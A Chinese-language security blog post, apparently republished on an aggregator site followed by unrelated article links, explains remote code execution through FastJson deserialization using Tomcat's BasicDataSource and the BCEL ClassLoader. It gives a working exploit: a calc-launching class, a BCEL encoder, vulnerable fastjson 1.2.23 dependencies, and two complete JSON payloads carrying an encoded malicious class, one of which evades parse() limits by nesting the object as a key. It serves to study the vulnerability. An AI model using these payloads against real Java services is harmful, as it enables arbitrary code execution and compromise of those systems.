【Web】速谈FastJson反序列化中BasicDataSource的利用

目录

关于BCEL

BCEL的恶意利用demo

FastJson配合BCEL初始化任意类

parse情况下后天精心构造弥补先天之不足

exp

参考文章:

BCEL ClassLoader去哪了

Java动态类加载,当FastJson遇到内网

关于BCEL

BCEL(Byte Code Engineering Library)的全名是Apache Commons BCEL,属于Apache Commons项目下的一个子项目,BCEL库提供了一系列用于分析、创建、修改Java Class文件的API。相较Commons Collections,BCEL被包含在原生JDK中,更容易被利用。

BCEL Classloader在 JDK < 8u251之前是在rt.jar里面
在Tomcat中也会存在相关的依赖
tomcat7:org.apache.tomcat.dbcp.dbcp.BasicDataSource
tomcat8+:org.apache.tomcat.dbcp.dbcp2.BasicDataSource

com.sun.org.apache.bcel.internal.util.ClassLoader重写了Java内置的ClassLoader#loadClass()方法,会判断类名是否是$$BCEL$$开头,如果是的话,将会对这个字符串进行decode。可以理解为是传统字节码的HEX编码,再将反斜线替换成$。默认情况下外层还会加一层GZip压缩。

BCEL的恶意利用demo

  • Repository用于将一个Java Class先转换成原生字节码(也可以用javac命令)

  • Utility用于将原生的字节码转换成BCEL格式的字节码

package com.FJ;import java.io.IOException;public class calc {public calc() throws IOException {Runtime.getRuntime().exec("calc");}
}
package com.FJ;import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.bcel.internal.classfile.JavaClass;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import com.sun.org.apache.bcel.internal.util.ClassLoader;import java.io.IOException;public class BcelTest {public static void main(String[] args) throws IOException, ClassNotFoundException, IllegalAccessException, InstantiationException {JavaClass cls = Repository.lookupClass(calc.class);String code = Utility.encode(cls.getBytes(),true);System.out.println("$$BCEL$$"+code);// 加载类并实例化new ClassLoader().loadClass("$$BCEL$$"+code).newInstance();}
}

FastJson配合BCEL初始化任意类

在之前的文章我们已经介绍过了TemplatesImpl,JdbcRowSetImpl链,当不出网也不开启Feature.SupportNonPublicField的时候,我们需要BasicDataSource这条链

调用链:getConnection()->createDataSource()->createConnectionFactory()->createDriver()

我们简单看下BasicDataSource#createDriver

 static Driver createDriver(BasicDataSource basicDataSource) throws SQLException {Driver driverToUse = basicDataSource.getDriver();String driverClassName = basicDataSource.getDriverClassName();ClassLoader driverClassLoader = basicDataSource.getDriverClassLoader();String url = basicDataSource.getUrl();if (driverToUse == null) {Class<?> driverFromCCL = null;String message;if (driverClassName != null) {try {try {if (driverClassLoader == null) {driverFromCCL = Class.forName(driverClassName);} else {driverFromCCL = Class.forName(driverClassName, true, driverClassLoader);}} catch (ClassNotFoundException var8) {driverFromCCL = Thread.currentThread().getContextClassLoader().loadClass(driverClassName);}} catch (Exception var9) {message = "Cannot load JDBC driver class '" + driverClassName + "'";basicDataSource.log(message, var9);throw new SQLException(message, var9);}}try {if (driverFromCCL == null) {driverToUse = DriverManager.getDriver(url);} else {driverToUse = (Driver)driverFromCCL.getConstructor().newInstance();if (!driverToUse.acceptsURL(url)) {throw new SQLException("No suitable driver", "08001");}}} catch (Exception var10) {message = "Cannot create JDBC driver of class '" + (driverClassName != null ? driverClassName : "") + "' for connect URL '" + url + "'";basicDataSource.log(message, var10);throw new SQLException(message, var10);}}return driverToUse;}

Class.forname当将initial参数设置为true时,表示希望初始化该类。这意味着除了加载类之外,还会触发该类的初始化操作,包括执行静态初始化块和静态变量赋值等。

然后driverClassName和driverClassLoader都是我们可控的,这不为所欲为了,BCELClassLoader会直接从 classname 中提取 Class 的 字节码。那么我们就可以设置​​driverClassLoader​​​为com.sun.org.apache.bcel.internal.util.ClassLoader​​​,设置​​driverClassName​​为恶意的BCEL格式的字节码,配合BCEL初始化任意恶意对象。

但遗憾的是

FastJson中的 parse() 会识别并调用目标类的 setter 方法及某些特定条件的 getter 方法,而 parseObject() 由于多执行了 JSON.toJSON(obj),所以在处理过程中会调用反序列化目标类的所有 setter 和 getter 方法。

所谓特定条件条件便是返回值类型继承自Collection Map AtomicBoolean AtomicInteger AtomicLong的getter方法

当反序列化的方法为parse()时getConnection不满足fastjson对自动调用getter的要求(返回值类型继承自Collection或Map或AtomicBoolean或AtomicInteger)

但我们可以通过精心构造EXP来弥补先天之不足:

parse情况下后天精心构造弥补先天之不足

首先在​​{“@type”: “org.apache.tomcat.dbcp.dbcp2.BasicDataSource”……}​​​ 这一整段外面再套一层​​{}​​,这样的话会把这个整体当做一个JSONObject,会把这个当做key,值为xxx。在​​DefaultJSONParser.parseObject​​方法后面会调用key的toString方法

key为​​JSONObject​​对象,会调用该对象的toString方法。而且JSONObject是Map的子类,当调用​​toString​​的时候,会依次调用该类的getter方法获取值。然后会以字符串的形式输出出来。所以会调用到​​BasicDataSource#getConnection​​方法。

从而达成为所欲为的目的。

exp

pom依赖

<dependency><groupId>org.apache.tomcat</groupId><artifactId>tomcat-dbcp</artifactId><version>8.5.45</version></dependency><dependency><groupId>com.alibaba</groupId><artifactId>fastjson</artifactId><version>1.2.23</version></dependency>

弹计算器的奇妙咒语(parse版)

package com.FJ;import com.alibaba.fastjson.JSON;public class FJ {public static void main(String[] args) {String payload ="{\n"+ "    {\n"+ "        \"aaa\": {\n"+ "                \"@type\": \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\n"+ "                \"driverClassLoader\": {\n"+ "                    \"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\n"+ "                },\n"+ "                \"driverClassName\": \"$$BCEL$$$l$8b$I$A$A$A$A$A$A$AuQ$cbn$daP$Q$3d$X$M6$8e$J$8f$U$f2h$9e$7d$C$L$yu$L$ea$a6J7u$93$wD$e9$fa$fa$e6$8a$5e062$97$88$3f$ea$9a$N$ad$ba$e8$H$f4$a3$aa$ccu$9eRZK$9e$f1$9c$99s$e6$8c$fc$e7$ef$af$df$A$de$e1$8d$L$H$9b$$$b6$b0$ed$60$c7$e4$e76v$5d$U$b0gc$df$c6$BC$b1$afb$a5$df3$e4$5b$ed$L$G$ebCr$v$Z$w$81$8a$e5$c9$7c$S$ca$f4$9c$87$R$n$f5$m$R$3c$ba$e0$a92$f5$zh$e9oj$c6$b0$j$88d$e2_$f2t$y$d30Y$f8$a1$90$91$7f$7c$a5$a2$k$83$d3$X$d1$ed$GF$8cF0$e2W$dc$8fx$3c$f4$8f$XBN$b5Jb$g$x$P4$X$e3$cf$7c$9a$v$93I$Gw$90$ccS$n$3f$w$b3$a9d$e4$ba$86$eb$a1$E$d7$c6$a1$87$p$bc$m$7dr$r$bar$n$3d$bc$c4$x$86$8d$7f$e8$7bx$N$97a$f3$3f$$$Z$aa$P$a4$d3p$q$85f$a8$3d$40g$f3X$ab$J$99p$87R$df$X$8dV$3bx2C$97X$e4E0$bcm$3d$ea$Ot$aa$e2a$ef1$e1K$9a$I9$9b$R$a12$a5$a6$ce$ee$3fO$b9$90t$97M$bf$cd$3c90s$z$c55$aa$7c$ca$8cr$a1$f3$Dl$99$b5$3d$8a$c5$M$cc$a3L$d1$bb$Z$c0$3a$w$94$jT$ef$c9$3c$T$D$ea$3f$91$ab$e7W$b0$be$7e$87$f3$a9$b3Bq$99$e1$r$e2$WH$c5$u6$e9$cb$e8$962$d4$se$H5R$ba$dbP$86Eu$9d$aa$Nzm$e4$C$h$cf$yj42S$cdk$dfl$i$C$80$C$A$A\"\n"+ "        }\n"+ "    }:\"xxx\"\n"+ "}";JSON.parse(payload);}
}

 

但parseObject() 由于多执行了 JSON.toJSON(obj),所以在处理过程中会调用反序列化目标类的所有 setter 和 getter 方法,就不需要这么麻烦。

直接用最原始而朴素的exp来打

package com.FJ;import com.alibaba.fastjson.JSON;
import org.apache.tomcat.dbcp.dbcp2.BasicDataSource;public class FJ {public static void main(String[] args) {String payload ="{\n" +"    \"@type\": \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\n" +"    \"driverClassLoader\": {\n" +"        \"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\n" +"    },\n" +"    \"driverClassName\": \"$$BCEL$$$l$8b$I$A$A$A$A$A$A$AuQ$cbn$daP$Q$3d$X$M6$8e$J$8f$U$f2h$9e$7d$C$L$yu$L$ea$a6J7u$93$wD$e9$fa$fa$e6$8a$5e062$97$88$3f$ea$9a$N$ad$ba$e8$H$f4$a3$aa$ccu$9eRZK$9e$f1$9c$99s$e6$8c$fc$e7$ef$af$df$A$de$e1$8d$L$H$9b$$$b6$b0$ed$60$c7$e4$e76v$5d$U$b0gc$df$c6$BC$b1$afb$a5$df3$e4$5b$ed$L$G$ebCr$v$Z$w$81$8a$e5$c9$7c$S$ca$f4$9c$87$R$n$f5$m$R$3c$ba$e0$a92$f5$zh$e9oj$c6$b0$j$88d$e2_$f2t$y$d30Y$f8$a1$90$91$7f$7c$a5$a2$k$83$d3$X$d1$ed$GF$8cF0$e2W$dc$8fx$3c$f4$8f$XBN$b5Jb$g$x$P4$X$e3$cf$7c$9a$v$93I$Gw$90$ccS$n$3f$w$b3$a9d$e4$ba$86$eb$a1$E$d7$c6$a1$87$p$bc$m$7dr$r$bar$n$3d$bc$c4$x$86$8d$7f$e8$7bx$N$97a$f3$3f$$$Z$aa$P$a4$d3p$q$85f$a8$3d$40g$f3X$ab$J$99p$87R$df$X$8dV$3bx2C$97X$e4E0$bcm$3d$ea$Ot$aa$e2a$ef1$e1K$9a$I9$9b$R$a12$a5$a6$ce$ee$3fO$b9$90t$97M$bf$cd$3c90s$z$c55$aa$7c$ca$8cr$a1$f3$Dl$99$b5$3d$8a$c5$M$cc$a3L$d1$bb$Z$c0$3a$w$94$jT$ef$c9$3c$T$D$ea$3f$91$ab$e7W$b0$be$7e$87$f3$a9$b3Bq$99$e1$r$e2$WH$c5$u6$e9$cb$e8$962$d4$se$H5R$ba$dbP$86Eu$9d$aa$Nzm$e4$C$h$cf$yj42S$cdk$dfl$i$C$80$C$A$A\"\n" +"}\n";JSON.parseObject(payload);BasicDataSource basicDataSource = new BasicDataSource();}
}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/718299.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

跨时钟信号处理方法

跨时钟信号处理方法

1. 背景 现在的芯片&#xff08;比如SOC&#xff0c;片上系统&#xff09;集成度和复杂度越来越高&#xff0c;通常一颗芯片上会有许多不同的信号工作在不同的时钟频率下。比如SOC芯片中的CPU通常会工作在一个频率上&#xff0c;总线信号&#xff08;比如DRAM BUS&#xff09;会…
阅读更多...
python+Django+Neo4j中医药知识图谱与智能问答平台

python+Django+Neo4j中医药知识图谱与智能问答平台

文章目录 项目地址基础准备正式运行 项目地址 https://github.com/ZhChessOvO/ZeLanChao_KGQA 基础准备 请确保您的电脑有以下环境&#xff1a;python3&#xff0c;neo4j 在安装目录下进入cmd&#xff0c;输入指令“pip install -r requirement.txt”,安装需要的python库 打…
阅读更多...
猫为什么挑食?可以改善、预防猫咪挑食的主食冻干分享

猫为什么挑食?可以改善、预防猫咪挑食的主食冻干分享

现在的猫咪主人都把自家的小猫当成了心头的宝贝&#xff0c;呵护备至。最令人头疼的就是猫咪挑食不吃猫粮&#xff0c;猫为什么挑食&#xff1f;遇到这类情况怎么办呢&#xff1f;今天&#xff0c;我要分享一个既能确保猫咪不受苦&#xff0c;又能有效改善挑食问题的方法。 一、…
阅读更多...
vue api封装

vue api封装

api封装 由于一个项目里api是很多的&#xff0c;随处都在调&#xff0c;如果按照之前的写法&#xff0c;在每个组件中去调api&#xff0c;一旦api有改动&#xff0c;遍地都要去改&#xff0c;所以api应该也要封装一下&#xff0c;将api的调用封装在函数中&#xff0c;将函数集…
阅读更多...
C++实现简易版http server

C++实现简易版http server

mini服务器简介 mini服务器功能 1.实现了GET和POST方法的HTTP request和HTTP respond的构建和发送&#xff0c;使服务器可以完成基本通信功能。 2.使用了线程池技术&#xff0c;使服务器可以一次接收更多的链接和加快了服务器处理数据的速度。 3.实现了简易的CGI&#xff0…
阅读更多...
【MATLAB源码-第155期】基于matlab的OFDM系统多径信道LS,LMMSE,SVD三种估计算法的比较误码率对比仿真。

【MATLAB源码-第155期】基于matlab的OFDM系统多径信道LS,LMMSE,SVD三种估计算法的比较误码率对比仿真。

操作环境&#xff1a; MATLAB 2022a 1、算法描述 OFDM&#xff08;Orthogonal Frequency Division Multiplexing&#xff0c;正交频分复用&#xff09;是一种高效的无线信号传输技术&#xff0c;广泛应用于现代通信系统&#xff0c;如Wi-Fi、LTE和5G。OFDM通过将宽带信道划分…
阅读更多...
jmeter 按流量阶梯式压测数据库

jmeter 按流量阶梯式压测数据库

当前版本&#xff1a; jmeter 5.6.3mysql 5.7.39 简介 JMeter 通过 BZM - Arrivals Thread Group 来模拟并发到达的用户流量、按时间加压&#xff0c;可以有效地帮助测试人员评估系统在高压力和高并发情况下的性能表现。 文章目录如下 1. 下载插件 2. 界面说明 3. 测试步骤…
阅读更多...
C#在并发编程使用Frozen来确保线程安全性

C#在并发编程使用Frozen来确保线程安全性

在C#中&#xff0c;Frozen方法通常用于通过不可变对象来确保线程安全性。这通常在并发编程中很有用&#xff0c;特别是在共享状态的多线程环境中。Frozen方法是Caliburn Micro框架中的一个方法&#xff0c;它用于将对象标记为不可变。 当你调用Frozen方法时&#xff0c;它返回…
阅读更多...
云计算 2月26号 (进程管理和常用命令)

云计算 2月26号 (进程管理和常用命令)

一、权限扩展 文件权限管理之&#xff1a; 隐藏权限防止root误删除 文件属性添加与查看 [rootlinux-server ~]# touch file1 file2 file3 1.查看文件属性 [rootlinux-server ~]# lsattr file1 file2 file3 ---------------- file1 ---------------- file2 ---------------- f…
阅读更多...
【FAQ】HarmonyOS SDK 闭源开放能力 —Account Kit

【FAQ】HarmonyOS SDK 闭源开放能力 —Account Kit

1.问题描述 实时验证和非实时验证的区别是什么&#xff1f; 解决方案 相同点&#xff1a; “手机号快速验证”和“实时验证”都是为了向用户发起获取手机号信息的请求。最终目的都是为了获取到手机号。这两种获取方式都需要完成“获取您的手机号”的Scope权限申请。 区别&…
阅读更多...
UDP协议和TCP协议详解

UDP协议和TCP协议详解

文章目录 应用层自定义协议 传输层udp协议TCP协议1.确认应答2.超时重传3.连接管理建立连接, 三次握手断开连接, 四次挥手tcp的状态 4.滑动窗口5.流量控制6.拥塞控制7.延时应答8.携带应答9.面向字节流10.异常情况 应用层 自定义协议 客户端和服务器之间往往要进行交互的是“结构…
阅读更多...
Eigen-约简,访问和广播

Eigen-约简,访问和广播

约简化&#xff0c;访客和广播 一、约简化1. 标准计算2. 布尔约减 二、访问三、部分约简1. 将部分约减与其他业务相结合 四、广播1. 将广播与其他业务相结合 一、约简化 在Eigen中&#xff0c;约简化是一个接受矩阵或数组并返回单个标量值的函数。最常用的约简方法之一是.sum(…
阅读更多...
心法利器[108] | 微调与RAG的优缺点分析

心法利器[108] | 微调与RAG的优缺点分析

心法利器 本栏目主要和大家一起讨论近期自己学习的心得和体会。具体介绍&#xff1a;仓颉专项&#xff1a;飞机大炮我都会&#xff0c;利器心法我还有。 2023年新的文章合集已经发布&#xff0c;获取方式看这里&#xff1a;又添十万字-CS的陋室2023年文章合集来袭&#xff0c;更…
阅读更多...
修复通达OA 百度ueditor 文件上传漏动

修复通达OA 百度ueditor 文件上传漏动

前些日子&#xff0c;服务器阿里云监控报警&#xff0c;有文件木马文件&#xff0c;因为非常忙&#xff0c;就没及时处理&#xff0c;直接删除了木马文件了事。 谁知&#xff0c;这几天对方又上传了木马文件。好家伙&#xff0c;今天不花点时间修复下&#xff0c;你都传上瘾了…
阅读更多...
PHP【swoole】

PHP【swoole】

前言 Swoole官方文档&#xff1a;Swoole 文档 Swoole 使 PHP 开发人员可以编写高性能高并发的 TCP、UDP、Unix Socket、HTTP、 WebSocket 等服务&#xff0c;让 PHP 不再局限于 Web 领域。Swoole4 协程的成熟将 PHP 带入了前所未有的时期&#xff0c; 为性能的提升提供了独一无…
阅读更多...
Dynamo初学尝试梳理

Dynamo初学尝试梳理

学习Dynamo有一段时间了&#xff0c;最近整理了下自己的笔记&#xff0c;分享一些给初学者&#xff0c;做个备忘吧&#xff01;&#xff08;PS&#xff1a;很多资料网上都能搜到&#xff0c;我仅仅是收集整理下笔记&#xff0c;分享给大家&#xff09; 今天先简单介绍下Dynamo…
阅读更多...
展厅设计中多媒体的常用技术

展厅设计中多媒体的常用技术

1、互动投影 可以大大提高展厅和观众之间的互动体验&#xff0c;使观众不仅可以享受观看&#xff0c;还可以在轻松娱乐的氛围中娱乐的氛围中享受每个展览的背景故事和内涵&#xff0c;使整个参观过程非常轻松愉快。 2、幻影成像 可以全面展示企业产品的生产过程&#xff0c;让观…
阅读更多...
STM32 (4) GPIO(1)

STM32 (4) GPIO(1)

1.芯片的引脚分布 2.普通IO引脚的命名规则 3.IO复用 IO引脚身兼数职的现象叫做IO复用&#xff0c;可以使芯片拥有更多的功能&#xff0c;例如&#xff1a; PA9和PA10既可以用于GPIO的引脚&#xff0c;也可以用于串口或定时器的引脚 通用&#xff1a;CPU直接控制IO引脚的输入输…
阅读更多...
Linux:用户格式显示进程

Linux:用户格式显示进程

简介 在Linux系统中&#xff0c;ps 命令用于查看当前系统中的进程。ps -aux 是该命令的一个常用选项组合&#xff0c;用于以用户格式显示所有进程。 ps -aux 输出的信息内容及含义&#xff1a; USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND r…
阅读更多...
【OpenGL编程手册-04】详细解释着色器

【OpenGL编程手册-04】详细解释着色器

着色器 目录 一、说明二、着色器语言GLSL2.1 典型的着色器代码2.2 数据类型2.2.1 向量 2.3 输入与输出2.3.1 顶点着色器2.3.2 片段着色器 2.4 Uniform2.5 函数后缀含义2 .6 更多属性&#xff01; 三、我们自己的着色器类四、从文件读取五、 编译着色器练习 一、说明 在Hello T…
阅读更多...
最新文章

Copyright @ 2022~2023